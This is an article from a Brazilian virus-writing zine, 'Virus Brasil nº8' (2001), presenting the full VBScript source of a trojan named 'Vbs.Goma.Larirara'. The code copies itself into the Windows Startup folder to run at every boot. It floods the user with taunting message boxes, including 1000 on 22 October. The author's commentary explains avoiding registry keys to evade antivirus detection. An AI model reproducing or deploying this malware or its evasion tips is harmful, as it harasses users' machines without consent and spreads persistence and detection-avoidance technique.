Virus Brasil nº8:(larirara.txt):20/02/2001 << Back To Virus Brasil nº 8
─────────────────────────────────────────────────────────────────────────── ___ __ ___ ___ ___ | |__) | | | |___| |\ | | | \ |___| / | | | \| ─────────────────────────────────────────────────────────────────────────── ──────────────────────────────────────────────── 7 - Vbs.Goma.Larirara por nim_bus@hotmail.com ──────────────────────────────────────────────── Originais em arquivo .TXT sem acentuacao O arquivo abaixo eh um trojan em Visual Basic Script (.VBS),ro- da em qualquer computador com um windows instalado, se for o 95 mas tiver o IE 5.? instalado, tambem rola numa boa... Arrumei um tutorial, massa pra caralho pra vbscript, depois co- loco na pagina, tenho que arrumar alguns links nele, mas ajuda bas- tante... Bom, deixa eu explicar o funcionamento do trojan. O trojan eh muito simples e foi feito em poucos minutos, a ide- ia eh de um camarada meu da faculdade, valeu Poin. Para nao dar pala, igual a maioria dos vbs's, nao utilizo nada de chaves no registro, nao altero ele, os av's detectam muito fa- cilmente um vbs que contenha algo para alterar o registro como sendo um codigo malicioso. Mas como fazer o trojan rodar a cada nova execucao do windows, sem estar com uma chave no registro em "Run" e o trojan em algum lu- gar como o diretorio \System por exemplo .( As vezes os virii makers deixam algumas coisas sempre iguais e eu nao entendo o porque... Mas esta valendo, funciona, digamos que seja algum tipo de padronizacao, uma ISO... ). Bom, onde estavamos, ah sim, falando sobre como rodar o trojan, ai me lembrei dum tal "Iniciar" que sempre fica vazio , no meu caso fica com a barra do office e uma parada do pgp... Com essa magnifica refrescada de memoria, consegui resolver do- is problemas, o de onde colocar o trojan e como faze-lo rodar a cada nova execucao do windows. Dificilmente algum usuario percebera como o trojan esta agindo. Pelo menos uma vez ele sera executado e deixara o usuario um pouco intrigado com que raio de perguntas sao essas ???? ──────────────────────────────────────────────────────────────────────────── __ __ / __ . __ __ __ __ ___ __ | | | | \ | | _ | | |_ | | |\| | |_ |__ |__| |__/ | |__| |__| | |__| | | | |__ ──────────────────────────────────────────────────────────────────────────── ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' ' Goma Larirara 1521 ' Vbs Trojan Stealth. No destructive payload ' Execute when windows start !!! ' No bugs !!! 100% fully work. No comment's on code ' Mail to : nim_bus@hotmail.com ' Home Page : http://virusbrasil.8m.com ' ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' On Error Resume Next dim filesys, demofile, contador set filesys = CreateObject ("Scripting.FileSystemObject") set demofile = filesys.GetFile("larirara.vbs") demofile.Copy("c:\WINDOWS\Menu Iniciar\Programas\Iniciar\iniciar.vbs") set demofile = filesys.GetFile("c:\WINDOWS\Menu Iniciar\Programas\Iniciar\iniciar.vbs") demofile.Attributes = 1 if Month(Date) = 10 and Day(Date) = 22 then For contador = 1 to 1000 msgbox "Valeu irmπos, sinto falta de vocΩs, descansem em paz !!!" Next end if For contador = 1 To 5 If contador = 1 then MsgBox "Clica em algum lugar ai, pato !", contador End if If contador = 2 or contador = 3 then MsgBox "Op's tente novamente, clicando em outro botao !", contador End if If contador = 4 then MsgBox "Nao funciona !!! UΘ ???", contador Else MsgBox "Nao adianta ???!!!??? hahaha", contador End if Next For contador = 1 to 5 MsgBox "Bem Vindo ao seu pior pesadelo !!!", VBQuestion,"Goma.Larirara" Next ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' O trojan eh muito basico, nao apaga nada soh zoa o usuario , o programa cria um arquivo o "larirara.vbs" no menu iniciar, com atri- butos de arquivo oculto, ou read only, nao lembro agora, e nao tenho como testar, eh um dos dois... Se o dia do sistema for 22.10 de qualquer ano o usuario vai fi- car um pouco puto, pois o que ele mais vai ver eh uma lembranca dos meus camaradas, que partiram a algum tempo atras... Em qualquer outro dia, tres mensagens com muitos botoes que nao estao vinculados aa nenhum comando surgem e o usuario fica a deriva clicando em qualquer dos botoes a resposta eh a mesma: - Nova Frase! Creio que seja soh isso... E' isso, sem mais, nim_bus@hotmail.com ──────────────────────────────────────────────────────────────────────────── Copyright ╕ 2000, Vírus Brasil ⌐ ────────────────────────────────────────────────────────────────────────────